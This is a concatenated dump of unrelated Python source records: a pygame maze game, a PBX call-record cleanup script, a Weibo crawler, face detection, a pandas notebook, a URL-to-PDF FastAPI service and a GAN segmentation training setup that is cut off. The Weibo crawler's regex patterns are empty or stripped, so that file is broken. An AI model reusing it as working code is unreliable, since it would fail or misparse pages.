меню\n exit = False\n menu = True\n score_table = False\n\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n # Кнопка Start Game\n if button_start.collidepoint(mouse_x, mouse_y):\n # нажата...\n button_text_start = create_text('Start Game', font=font, font_color=(0, 0, 0),\n bg_color=color, pos_x=400, pos_y=175)\n pygame.draw.rect(screen, color, button_start)\n if is_mouse_down:\n menu = False\n else:\n button_text_start = create_text('Start Game', font=font, font_color=color,\n pos_x=400, pos_y=175)\n pygame.draw.rect(screen, color, button_start, 2)\n\n # Кнопка Scores\n if button_scores.collidepoint(mouse_x, mouse_y):\n # нажата...\n button_text_scores = create_text('Scores', font=font, font_color=(0, 0, 0),\n bg_color=color, pos_x=400, pos_y=250)\n pygame.draw.rect(screen, color, button_scores)\n if is_mouse_down:\n score_table = True\n else:\n button_text_scores = create_text('Scores', font=font, font_color=color,\n pos_x=400, pos_y=250)\n pygame.draw.rect(screen, color, button_scores, 2)\n\n # Кнопка Exit\n if button_exit.collidepoint(mouse_x, mouse_y):\n # нажата...\n button_text_exit = create_text('Exit', font=font, font_color=(0, 0, 0),\n bg_color=color, pos_x=400, pos_y=325)\n pygame.draw.rect(screen, color, button_exit)\n if is_mouse_down:\n exit = True\n else:\n button_text_exit = create_text('Exit', font=font, font_color=color,\n pos_x=400, pos_y=325)\n pygame.draw.rect(screen, color, button_exit, 2)\n\n screen.blit(*button_text_start)\n screen.blit(*button_text_scores)\n screen.blit(*button_text_exit)\n return menu, score_table, exit\n\n\ndef create_score_table(screen, color, font, is_mouse_down):\n # Выводим лучшие результаты из базы данных (простой файл)\n results = []\n with open('data/results', mode='r') as fd:\n for n, line in enumerate(fd.readlines(), start=1):\n results.append(tuple(map(int, line.strip().split(':')))) # coins, elapsed_seconds, maze_width, maze_height\n\n # Сортируем результаты. Больше пяти строк не выводим (экран не вмещает)\n results = sorted(results, key=itemgetter(0), reverse=True)[:5]\n\n for n, (coins, elapsed_seconds, maze_width, maze_height) in enumerate(results):\n text = f'{n + 1}. {coins} coins, {elapsed_seconds} seconds, maze {maze_width}x{maze_height}'\n text, rect = create_text(text, font=font, font_color=color,\n pos_x=400, pos_y=150 + 50 * n)\n # Выравниваем текст не по центру, а по левому краю\n rect.x = 150\n rect.y = 150 + 50 * n\n screen.blit(text, rect)\n\n button_back = pygame.Rect(200, 500, 400, 50)\n\n # Функция возвращает флаг, который определяет дальнейшее поведение меню\n score_table = True\n\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n # Кнопка Back to Menu\n if button_back.collidepoint(mouse_x, mouse_y):\n # нажата...\n button_text_back = create_text('Back to Menu', font=font, font_color=(0, 0, 0),\n bg_color=color, pos_x=400, pos_y=525)\n pygame.draw.rect(screen, color, button_back)\n if is_mouse_down:\n score_table = False\n else:\n button_text_back = create_text('Back to Menu', font=font, font_color=color,\n pos_x=400, pos_y=525)\n pygame.draw.rect(screen, color, button_back, 2)\n\n screen.blit(*button_text_back)\n return score_table\n\n\ndef maze_game():\n pygame.init()\n running = True\n pause = False\n menu = True\n score_table = False\n\n # clock setup\n clock = pygame.time.Clock()\n fps = 20 # Увеличивая FPS или размер лабиринта Игра начинает тормозить из-за большого кол-ва спрайтов\n\n # screen setup\n size = width, height = 800, 600 # in pixels\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption('-|- Maze Game -|-')\n\n # font setup (# 2nd parameter is size of the font)\n font = pygame.font.Font('data/fonts/FreeSansBold.ttf', 32)\n large_font = pygame.font.Font('data/fonts/FreeSansBold.ttf', 64)\n small_font = pygame.font.Font('data/fonts/FreeSansBold.ttf', 16)\n blood_color = (240, 0, 0)\n black_color = (0, 0, 0)\n default_color = (239, 232, 218)\n\n # menu\n while running and menu:\n screen.fill((0, 0, 0))\n header = create_text('MAZE', font=large_font, font_color=blood_color,\n pos_x=width / 2, pos_y=80)\n screen.blit(*header)\n\n is_mouse_down = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n is_mouse_down = True\n\n if score_table:\n # Таблица результатов\n score_table = create_score_table(screen=screen, color=blood_color, font=font,\n is_mouse_down=is_mouse_down)\n else:\n # Основное меню\n menu, score_table, exit = create_menu(screen=screen, color=blood_color, font=font,\n is_mouse_down=is_mouse_down)\n running = running and not exit\n\n pygame.display.update()\n clock.tick(fps)\n\n # camera setup\n camera = Camera(width=width, height=height)\n\n # generate level, player, creatures\n maze_width = 10\n maze_height = 5\n generate_level(maze_width=maze_width, maze_height=maze_height) # в клетках\n\n # Вести учет занятых клеток, чтобы не ставить существ, монеты и прочие в одну клетку\n taken = []\n player = generate_player(taken=taken)\n generate_content(SpiderCreature, player=player, chance=0.7, taken=taken)\n generate_content(SkeletonCreature, player=player, chance=0.5, taken=taken)\n generate_content(BahamutCreature, player=player, chance=0.2, taken=taken)\n generate_content(CoinThing, player=player, chance=15.0, taken=taken)\n generate_content(HeartThing, player=player, chance=1.0, taken=taken)\n\n # Запустить существа ходить по карте\n pygame.time.set_timer(CREATURE_EVENT_TYPE, 100) # milliseconds\n # Запустить анимацию у вещей\n pygame.time.set_timer(THING_EVENT_TYPE, 300) # milliseconds\n\n start_time = time.time()\n elapsed_seconds = 0\n\n while running and player.health > 0 and player.win is False:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n # Пауза при нажатии пробела\n pause = not pause\n if pause:\n break # Прервать обработку событий, чтобы во время паузы существа не наносили урон\n if event.type == CREATURE_EVENT_TYPE:\n for creature in CREATURES_GROUP:\n creature.update()\n if event.type == THING_EVENT_TYPE:\n for thing in THING_GROUP:\n thing.update()\n\n if pause:\n # Игра на паузе\n text = create_text(' PAUSE ', font=font, font_color=default_color,\n bg_color=black_color, pos_x=width / 2, pos_y=height / 2)\n screen.blit(*text)\n pygame.display.flip()\n continue\n\n screen.fill((119, 204, 146)) # Цвет фона - это цвет травы\n elapsed_seconds = int(time.time() - start_time) # Время игры в секундах\n\n # Работает постоянно\n player.update()\n\n BLOOD_GROUP.update()\n ALL_SPRITES.draw(screen)\n PLAYER_GROUP.draw(screen)\n\n # изменяем ракурс камеры\n camera.update(player)\n # обновляем положение всех спрайтов\n for sprite in ALL_SPRITES:\n camera.apply(sprite)\n\n # Рисуем полоску статуса игры сверху\n health = '|' * player.health + ' ' * (100 - player.health)\n timer = f'{elapsed_seconds // 60:02}:{elapsed_seconds % 60:02}' # формат времени 00:00\n status_text = ' ' * 15 + f'Health: {health} Time: {timer} Coins: {player.coins:03}' + ' ' * 15\n status_line = create_text(status_text, font=small_font, font_color=default_color,\n bg_color=black_color, pos_x=width / 2, pos_y=height - 10)\n screen.blit(*status_line)\n\n pygame.display.flip()\n clock.tick(fps)\n\n # Создадим несколько текстов\n game_over = create_text('Game Over', font=font, font_color=blood_color,\n pos_x=width / 2, pos_y=height / 2)\n game_win = create_text('Congratulations! You won', font=font, font_color=blood_color,\n pos_x=width / 2, pos_y=height / 2)\n game_win_scores = create_text(f'You have collected {player.coins} coins', font=small_font,\n font_color=blood_color, pos_x=width / 2, pos_y=height / 2 + 30)\n game_win_times = create_text(f'... and played {elapsed_seconds} seconds', font=small_font,\n font_color=blood_color, pos_x=width / 2, pos_y=height / 2 + 50)\n\n play_again = False\n\n if player.win is True:\n # Однакратно произвести музыку, если пользователь выйграл\n pygame.mixer.Sound('data/sound_effect/win.wav').play()\n\n if player.win is False and player.health < 1:\n # Однакратно произвести музыку, если пользователь проиграл\n pygame.mixer.Sound('data/sound_effect/game_over.wav').play()\n\n # Игра завершилась, выясняем причину\n while running:\n screen.fill((0, 0, 0))\n\n if player.win is True:\n # Победа!\n screen.blit(*game_win)\n screen.blit(*game_win_scores)\n screen.blit(*game_win_times)\n elif player.health < 1:\n # Игрока съели монстры - проигрыш...\n screen.blit(*game_over)\n else:\n # Другая причина - возможно игру закрыли\n pass\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Любое нажатие мыши или кнопки вернет в начальное меню\n running = False\n play_again = True\n\n pygame.display.update()\n clock.tick(fps)\n\n # Запись в файл результата игры, если Игрок победил\n if player.win:\n result = f'{player.coins}:{elapsed_seconds}:{maze_width}:{maze_height}\\n'\n with open('data/results', mode='a+') as fd:\n fd.write(result)\n\n pygame.quit()\n return play_again\n\n\nclass BloodEffect(pygame.sprite.Sprite):\n # сгенерируем частицы разного размера\n def __init__(self, player, dx, dy):\n super().__init__(ALL_SPRITES, BLOOD_GROUP)\n self.image = load_image('25x25/blood.png')\n self.rect = self.image.get_rect()\n self.player = player\n\n # у каждой частицы своя скорость — это вектор\n self.velocity = [dx, dy]\n # и свои координаты\n self.rect.x, self.rect.y = player.rect.center\n self.rect.y += 10\n\n # гравитация будет одинаковой (значение константы)\n self.gravity = 1\n self.number = random.randint(0, 20) # Чем меньше число, тем больше крови - BLOOD MOD\n self.time = time.time()\n\n def update(self):\n if self.rect.colliderect(self.player) and time.time() - self.time < 0.5: # кровь летит пол секунды\n # применяем гравитационный эффект:\n # движение с ускорением под действием гравитации\n self.velocity[1] += self.gravity\n # перемещаем частицу\n self.rect.x += self.velocity[0]\n self.rect.y += self.velocity[1]\n elif self.number:\n self.kill() # некоторые следы крови остаются на клетках пола\n\n\ndef create_blood(player, damage):\n pygame.mixer.Sound('data/sound_effect/damage.wav').play()\n # количество создаваемых частиц\n blood_count = 10 * damage\n # возможные скорости\n numbers = range(-5, 6)\n for _ in range(blood_count):\n BloodEffect(player, random.choice(numbers), random.choice(numbers))\n\n\ndef create_text(text, font, font_color, bg_color=None, pos_x=0, pos_y=0):\n text = font.render(text, True, font_color, bg_color)\n rect = text.get_rect()\n rect.center = pos_x, pos_y\n return text, rect\n\n\n# http://rosettacode.org/wiki/Maze_generation#Python\n# Волшебное создание лабиринта(из Интернета)\ndef make_maze(w, h):\n vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)]\n ver = [['| '] * w + ['|'] for _ in range(h)] + [[]]\n hor = [['+--'] * w + ['+'] for _ in range(h + 1)]\n\n def walk(x, y):\n vis[y][x] = 1\n\n d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]\n random.shuffle(d)\n for (xx, yy) in d:\n if vis[yy][xx]: continue\n if xx == x: hor[max(y, yy)][x] = '+ '\n if yy == y: ver[y][max(x, xx)] = ' '\n walk(xx, yy)\n\n walk(random.randrange(w), random.randrange(h))\n\n s = ''\n for (a, b) in zip(hor, ver):\n # for x in a + b:\n # assert x in ('| ', ' ', '+', '|', '+--', '+ '), x\n s += ''.join(a + ['\\n'] + b + ['\\n'])\n return s.strip()\n\n\nif __name__ == '__main__':\n while maze_game():\n ALL_SPRITES = pygame.sprite.Group()\n TILES_GROUP = pygame.sprite.Group()\n PLAYER_GROUP = pygame.sprite.Group()\n WALL_GROUP = pygame.sprite.Group()\n FLOOR_GROUP = pygame.sprite.Group()\n CREATURES_GROUP = pygame.sprite.Group()\n THING_GROUP = pygame.sprite.Group()\n EXIT_GROUP = pygame.sprite.Group()\n BLOOD_GROUP = pygame.sprite.Group()","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":32843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"646171264","text":"#!/usr/bin/python\n\nimport MySQLdb,sys,datetime\n\nconfig = {\n\t'host':'127.0.0.1',\n\t'port':3306,\n\t'user':'freepbxuser',\n\t'passwd':'XXXXXXXXXX',\n\t'db':'asteriskcdrdb',\n}\n\ntry:\n\tcnn = MySQLdb.connect(**config)\nexcept MySQLdb.Error as e:\n\tprint(\"Mysql Error %d: %s\" % (e.args[0], e.args[1]))\n\tsys.exit(3)\n\nendtime = (datetime.datetime.now() - datetime.timedelta(days=1095)).strftime(\"%Y-%m-%d %H:%M:%S\")\ncur = cnn.cursor()\ntable_col = {\n\t'cdr':'calldate',\n\t'cel':'eventtime',\n}\n\nfor key in table_col:\n\tcleanup = \"delete from %s where %s < '%s'\" % (key, table_col[key], endtime)\n\toptimize = \"optimize table %s\" % (key)\n\n\ttry:\n\t\tcur.execute(cleanup)\n\t\tcnn.commit()\n\t\tprint(\"Table %s clean up complete\" % key)\n\texcept:\n\t\tprint(\"Table %s data delete failed!\" % key)\n\t\tcnn.rollback()\n\t\tsys.exit(3)\n\tcur.execute(optimize)\n\tprint(\"Table %s optimized\" % key)\n\t\ncur.close()\ncnn.close()\nsys.exit(0)\n","sub_path":"pbx_db_optimize.py","file_name":"pbx_db_optimize.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"400077416","text":"from collections import deque\nimport urllib\nimport urllib2\nimport cookielib\n\ndef get_data(this_url,headers):\n req = urllib2.Request(this_url,headers=headers)\n response = urllib2.urlopen(req)\n data = response.read()\n return data\n\ndef get_pageNum(data):\n re_pagenum = ''\n pattern = re.compile(re_pagenum,re.S)\n items = re.findall(pattern,data)\n item=items[0]\n return int(item[38:-4])\n\ndef get_fansfollow(catch_url,headers):\n idnset=set()\n home_page = catch_url+'1'\n data1 = get_data(home_page,headers)\n page=get_pageNum(data1)\n\n re_id = '[^<].*?[^>]'\n pattern = re.compile(re_id,re.S)\n for i in range(1,page):\n this_url = catch_url+str(i)\n data = get_data(this_url,headers)\n items = re.findall(pattern,data)\n for item in items:\n idnset.add(item[27:37]+item[39:-4])\n return idnset\n\ndef get_friends(fansset,followset):\n return fansset&followset\n","sub_path":"weibo_crawler/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"552598883","text":"import cv2\n#import castcadeclassifier which ha inbuild function of detecting a face\nface_cascade=cv2.CascadeClassifier(\"C:\\\\Users\\\\Lenovo\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python38\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml\")\n#it had converted my image in the form of num array\nimg = cv2.imread(\"C:\\\\Users\\\\Lenovo\\\\Pictures\\\\Camera Roll\\\\image.jpg\",1)\n#convert the image into gray\ngrey_img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# method to search face coordinate\nshapes=face_cascade.detectMultiScale(grey_img,scaleFactor=1.05,minNeighbors=5)\n#display the rectangle in the image\nfor x,y,w,h in shapes:\n img=cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),3)\n#resized image\nresized = cv2.resize(img,(int(img.shape[1]/2),int(img.shape[0]/2)))\n#it opens the window of image\ncv2.imshow(\"grey\", resized)\n#how much time we have to open that window if 0then whenevr we click any button widow will disappear\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","sub_path":"facedetection.py","file_name":"facedetection.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"372533819","text":"# ONLY EDIT FUNCTIONS MARKED CLEARLY FOR EDITING\n\nimport numpy as np\n\ndef question06(numServers, targetServer, times):\n # modify and then return the variable below\n if targetServer == 0:\n\n return 0\n\n fastest_times = times[0]\n visited = [0]\n visit = 0\n for i in range(len(times[visit])):\n for j in range(1, len(times[visit])):\n if visit in visited:\n visit = times[visit].index(sorted(times[visit])[j])\n else:\n break\n visited.append(visit)\n new_times = times[visit]\n for j in range(len(times[visit])):\n if (new_times[j] + fastest_times[visit] < fastest_times[j]):\n fastest_times[j] = new_times[j] + fastest_times[visit]\n if (visit == targetServer):\n break\n\n return fastest_times[targetServer]","sub_path":"q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"248918787","text":"#! /usr/bin/env python\n\n# -*- coding:utf-8 -*-\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport numpy as np\nimport pandas as pd\nclass FootTrajectory:\n index=0\n Py0=0.0\n Px0=0.12\n Pz0=0.01\n\n def __init__(self):\n dist1 = 0.06\n dist11 = 0.1\n dist12 = 0.1\n dist2 = 0.06\n dist3 = 0.03\n\n '''\n #formula eight shape trajectory version 1.0\n num_targets=400\n self.num_targets=num_targets\n target_position=np.array(\n [[\n dist2*np.sin(theta)*np.cos(theta),\n dist2*np.cos(theta),\n dist3*np.sin(theta)\n ]\n for theta in np.linspace(0,np.pi*2.0,num_targets)]\n )\n plt.subplot(1,2,1);\n plt.plot(target_position[:,0]);\n plt.plot(target_position[:,1]);\n plt.subplot(1,2,2);\n plt.plot(target_position[:,0],target_position[:,1]);\n plt.show();\n '''\n\n '''\n # formula eight shape trajectory version 2.0\n num_targets=400\n self.num_targets=num_targets\n xt,yt,zt=[],[],[]\n for theta in np.linspace(0,np.pi*2.0,num_targets):\n #xt.append(dist1*np.sin(theta)*np.cos(theta))\n xt.append(dist1*np.sin(theta*2.0))\n yt.append(dist2*np.sin(theta))\n zt.append(0.0*dist3*np.cos(theta))\n #dist1 = dist11*yt[-1] if yt[-1] > 0.0 else dist12*yt[-1]\n\n self.x=zt+self.Px0*np.ones(len(yt))\n self.y=xt+self.Py0*np.ones(len(xt))\n self.z=yt+self.Pz0*np.ones(len(zt))\n\n '''\n # data from file for eight shape trajectory version 3.0\n data_file = '/home/suntao/workspace/gorobots/projects/stbot/genesis/catkin_ws/src/stbot/scripts/eightTra.csv'\n #data_file = '/home/suntao/workspace/gorobots/projects/stbot/genesis/catkin_ws/src/stbot/scripts/parabolaTra.csv'\n #data_file = './eightTra.csv'\n resource_data = pd.read_csv(data_file, sep=',', names=['x','y'])\n\n\n data = np.zeros(resource_data.shape)\n num_targets=len(data)\n self.num_targets=num_targets\n for index in range(2):\n temp = resource_data.iloc[:,index]\n data[:,index]=tuple(temp)\n self.z=data[:,0]/100.0 + self.Pz0\n self.y=data[:,1]/35.0 + self.Py0 # taitui gaodu\n self.x=np.zeros(self.y.shape) +self.Px0\n '''\n # data from file for parabola shape trajectory version 3.0\n data_file = '/home/suntao/workspace/gorobots/projects/stbot/genesis/catkin_ws/src/stbot/scripts/parabolaTra.csv'\n resource_data = pd.read_csv(data_file, sep=',', names=['num','x','y'])\n\n\n data = np.zeros(resource_data.shape)\n num_targets=len(data)\n self.num_targets=num_targets\n for index in range(3):\n temp = resource_data.iloc[:,index]\n data[:,index]=tuple(temp)\n self.z=data[:,1]/100.0 + self.Pz0\n self.y=data[:,2]/100.0 + self.Py0 # taitui gaodu\n self.x=np.zeros(self.y.shape) +self.Px0\n '''\n def step(self):\n if self.index<=self.num_targets-2:\n self.index=self.index+1\n else:\n self.index=0\n\n def getOutput(self):\n return [self.x[self.index],self.y[self.index],self.z[self.index]]\n\nif __name__==\"__main__\":\n FT = FootTrajectory()\n x,y,z = [],[],[]\n for idx in range(len(FT.x)):\n x.append(FT.getOutput()[0])\n y.append(FT.getOutput()[1])\n z.append(FT.getOutput()[2])\n FT.step()\n plt.subplot(1,2,1);\n plt.plot(x,'r');\n plt.plot(y,'b');\n plt.plot(z,'k');\n plt.subplot(1,2,2);\n plt.plot(y,z);\n fig=plt.figure()\n ax1 = plt.axes(projection='3d')\n ax1.plot3D(x,y,z,'g');\n ax1.set_xlabel('X')\n ax1.set_ylabel('Y')\n ax1.set_zlabel('Z')\n\n plt.show();\n","sub_path":"projects/genesis/catkin_ws/src/stbot_apnc/scripts/eight_shape2.py","file_name":"eight_shape2.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134584393","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[2]:\n\n\nimport pandas as pd\n\n\n# In[5]:\n\n\nlabels=['a','b','c']\nmy_data=[10,20,30]\narr =np.array(my_data)\nd = {'a':10,'b':20,'c':30}\n\n\n# In[6]:\n\n\npd.Series(data=my_data)\n\n\n# In[7]:\n\n\npd.Series(my_data,labels)\n\n\n# In[8]:\n\n\nser1 =pd.Series([1,2,3,4],['USA','GERMANY','USSR','JAPAN'])\n\n\n# In[9]:\n\n\nser1\n\n\n# In[10]:\n\n\nser2=pd.Series([1,2,4,6],['USA','GERMANY','INDIA','JAPAN'])\n\n\n# In[11]:\n\n\nser3=ser1+ser2\n\n\n# In[12]:\n\n\nser3\n\n\n# In[13]:\n\n\nfrom numpy.random import randn\n\n\n# In[14]:\n\n\nnp.random.seed(101)\n\n\n# In[15]:\n\n\ndf =pd.DataFrame(randn(5,4),['A','B','C','D','E'],['W','X','Y','Z'])\n\n\n# In[16]:\n\n\ndf\n\n\n# In[17]:\n\n\ndf['W']\n\n\n# In[18]:\n\n\ndf[['W','Z']]\n\n\n# In[19]:\n\n\ntype(df)\n\n\n# In[20]:\n\n\ndf['new'] = df['W']*df['Y']\n\n\n# In[21]:\n\n\ndf\n\n\n# In[22]:\n\n\ndf.drop('new',axis=1,inplace=True)\n\n\n# In[23]:\n\n\ndf\n\n\n# In[24]:\n\n\ndf.drop('E')\n\n\n# In[25]:\n\n\ndf.drop('E',axis=0)\n\n\n# In[26]:\n\n\ndf.shape\n\n\n# In[27]:\n\n\ndf.loc[['A','B'],['W','Y']]\n\n\n# In[28]:\n\n\ndf\n\n\n# In[30]:\n\n\ndf[df['W']>0]\n\n\n# In[31]:\n\n\ndf.reset_index()\n\n\n# In[32]:\n\n\nnewwind='CA NY WY OR CO'.split()\n\n\n# In[33]:\n\n\ndf['States']=newwind\n\n\n# In[34]:\n\n\ndf\n\n\n# In[36]:\n\n\ndf.set_index('States',inplace=True)\n\n\n# In[37]:\n\n\ndf\n\n\n# In[38]:\n\n\noutside = ['G1','G1','G1','G2','G2','G2']\ninside = [1,2,3,1,2,3]\nhier_index = list(zip(outside,inside))\nhier_index = pd.MultiIndex.from_tuples(hier_index)\n\n\n# In[40]:\n\n\ndf=pd.DataFrame(np.random.randn(6,2),index=hier_index,columns=['A','B'])\ndf\n\n\n# In[41]:\n\n\ndf.loc['G1'].loc[1]\n\n\n# In[42]:\n\n\ndf = pd.DataFrame({'A':[1,2,np.nan],\n 'B':[5,np.nan,np.nan],\n 'C':[1,2,3]})\n\n\n# In[43]:\n\n\ndf\n\n\n# In[44]:\n\n\ndf.dropna()\n\n\n# In[45]:\n\n\ndf.dropna(axis=1)\n\n\n# In[47]:\n\n\ndf.dropna(thresh=2)\n\n\n# In[48]:\n\n\ndf.fillna(value='Anmol')\n\n\n# In[56]:\n\n\ndf['A'].fillna(value=df['C'].mean())\n\n\n# In[57]:\n\n\ndata = {'Company':['GOOG','GOOG','MSFT','MSFT','FB','FB'],\n 'Person':['Sam','Charlie','Amy','Vanessa','Carl','Sarah'],\n 'Sales':[200,120,340,124,243,350]}\n\n\n# In[58]:\n\n\ndf=pd.DataFrame(data)\n\n\n# In[60]:\n\n\ndf\n\n\n# In[61]:\n\n\ndf.groupby('Company')\n\n\n# In[62]:\n\n\nby_comp=df.groupby('Company')\n\n\n# In[63]:\n\n\nby_comp.mean()\n\n\n# In[64]:\n\n\ndf.groupby('Company').mean()\n\n\n# In[65]:\n\n\nby_comp.std()\n\n\n# In[66]:\n\n\nby_comp.min()\n\n\n# In[67]:\n\n\nby_comp.max()\n\n\n# In[68]:\n\n\nby_comp.describe()\n\n\n# In[72]:\n\n\nby_comp.describe().transpose()['FB']\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Pandas.py","file_name":"Pandas.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429189242","text":"import pdfkit\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom starlette.responses import Response\n\napp = FastAPI(\n docs_url=\"/print_service/docs\",\n openapi_url=\"/print_service/openapi.json\"\n)\n\n\nclass PostData(BaseModel):\n url: str\n filename: str = \"result\"\n\n\n@app.post(\"/\")\ndef index(data: PostData):\n pdf = pdfkit.from_url(data.url, False)\n filename = data.filename or \"output\"\n response = Response(\n pdf,\n headers={\n \"Content-Type\": \"application/pdf\",\n \"Content-Disposition\": f\"attachment; filename={filename}.pdf\",\n \"Content-Length\": str(len(pdf)),\n },\n )\n return response\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390030408","text":"\"\"\"\nCodes for training unsupervised segmentation incorporating shape prior via GAN.\nOptimized based on Mumford-Shah functional & GAN loss in an adversarial way.\n\"\"\"\n\nimport csv\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\n\n# ===================================\n# Import custom codes\n# ===================================\nimport config\nimport lr_scheduler\n\nfrom datasets import LSUNSegDataset\nfrom datasets import shape_prior_dataset\n\nfrom metrics import metric_seg\nfrom losses import gan_r1\nfrom losses import ms_seg_loss\n\nfrom networks import generator\nfrom networks import discriminator\n\n# ===================================\n# Get config\n# ===================================\ntrain_config = config.get_config()\n\n# config - experiment\noutput_dir = train_config.output_dir\nmonitor_interval = train_config.monitor_interval\nnum_plot_img = train_config.num_plot_img\n\n# config - data\nheight = train_config.height\nwidth = train_config.width\nsegment_data_train_dir = train_config.segment_data_train_dir\nsegment_data_val_dir = train_config.segment_data_val_dir\nprior_data_dir = train_config.prior_data_dir\nnum_train_split = train_config.num_train_split\nnum_val_split = train_config.num_val_split\nmin_scale = train_config.min_scale\n\n# config - networks\ntrained_ckpt_path = train_config.trained_ckpt_path\nnum_in_channel = train_config.num_in_channel\nnum_out_channel = train_config.num_out_channel\n\n# config - coefficient\ngamma1_tv_seg = train_config.gamma1_tv_seg\ngamma2_tv_region = train_config.gamma2_tv_region\nk_r1 = train_config.k_r1\n\n# config - optimization\nnum_epoch = train_config.num_epoch\ntrain_batch_size = train_config.train_batch_size\nval_batch_size = train_config.val_batch_size\ninit_lr_seg = train_config.init_lr_seg\ntop_lr_seg = train_config.top_lr_seg\nfinal_lr_seg = train_config.final_lr_seg\ninit_lr_discri = train_config.init_lr_discri\ntop_lr_discri = train_config.top_lr_discri\nfinal_lr_discri = train_config.final_lr_discri\nmomentum = train_config.momentum\nweight_decay = train_config.weight_decay\nbeta1_discri = train_config.beta1_discri\nbeta1_generator = train_config.beta1_generator\nnum_discri = train_config.num_discri\n\n# config - training environment\nnum_workers = train_config.num_workers\nmulti_gpu = train_config.multi_gpu\nnum_gpu = train_config.num_gpu\ncuda_id = train_config.cuda_id\n\n# ================================================\n# Set Path & Files to Save Training Result\n# ================================================\n# create output directory\ntry:\n os.mkdir(output_dir)\n print(\"Directory \" , output_dir, \" Created \") \nexcept FileExistsError:\n print(\"Directory \" , output_dir, \" already exists\")\n\n# file path to save .csv files which contain metrics and losses of every iteration\ncsv_metric_train = '{}/metric_train.csv'.format(output_dir)\ncsv_metric_val = '{}/metric_val.csv'.format(output_dir)\ncsv_losses = '{}/losses.csv'.format(output_dir)\nwith open(csv_metric_train, 'w', newline='') as f:\n writer_train = csv.writer(f)\n writer_train.writerow(['epoch', 'iteration', 'iou'])\nwith open(csv_metric_val, 'w', newline='') as f:\n writer_val = csv.writer(f)\n writer_val.writerow(['epoch', 'iteration', 'iou'])\nwith open(csv_losses, 'w', newline='') as f:\n writer_losses = csv.writer(f)\n writer_losses.writerow(['epoch', 'iteration', 'loss discri', 'loss seg'])\n\n# file path to save .txt files which contain best scores info\ntxt_scores_train = '{}/best_scores_train.txt'.format(output_dir)\ntxt_scores_val = '{}/best_scores_val.txt'.format(output_dir)\nwith open(txt_scores_train, 'w', newline='') as f:\n f.write('init score txt file for train' + os.linesep)\nwith open(txt_scores_val, 'w', newline='') as f:\n f.write('init score txt file for val' + os.linesep)\n\n# ===================================\n# define functions to help training\n# ===================================\n# weights initialization function\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n# ===================================\n# Load Data\n# ===================================\n# transforms\ntransform_prior = transforms.Compose([\n transforms.ToTensor(),\n transforms.ToPILImage(),\n transforms.RandomResizedCrop(size=int(height*1.40625), scale=(0.8, 2.5), ratio=(0.2, 5)),\n transforms.RandomAffine(0, translate=(0.05, 0.05), scale=(min_scale,1.6), shear=None),\n transforms.RandomHorizontalFlip(),\n transforms.CenterCrop(size=height),\n transforms.ToTensor()\n])\ntransform_train = transforms.Compose([\n transforms.ToTensor()\n ])\ntransform_val = transforms.Compose([\n transforms.ToTensor()\n ])\ntransform_target = transforms.Compose([\n transforms.ToTensor()\n ]) \n\n# datasets\ndataset_prior = shape_prior_dataset.PriorDataset(prior_data_dir,transform=transform_prior)\n\ndataset_train = LSUNSegDataset.LSUNSegTrainDataset(\n segment_data_train_dir,\n num_train_split,\n transform=transform_train,\n transform_gt=transform_target)\n\ndataset_val = LSUNSegDataset.LSUNSegValDataset(\n segment_data_val_dir,\n num_val_split,\n transform=transform_val,\n transform_gt=transform_target)\n\n# dataloaders\nloader_prior = torch.utils.data.DataLoader(\n dataset = dataset_prior,\n batch_size=train_batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=True)\n\nloader_train = torch.utils.data.DataLoader(\n 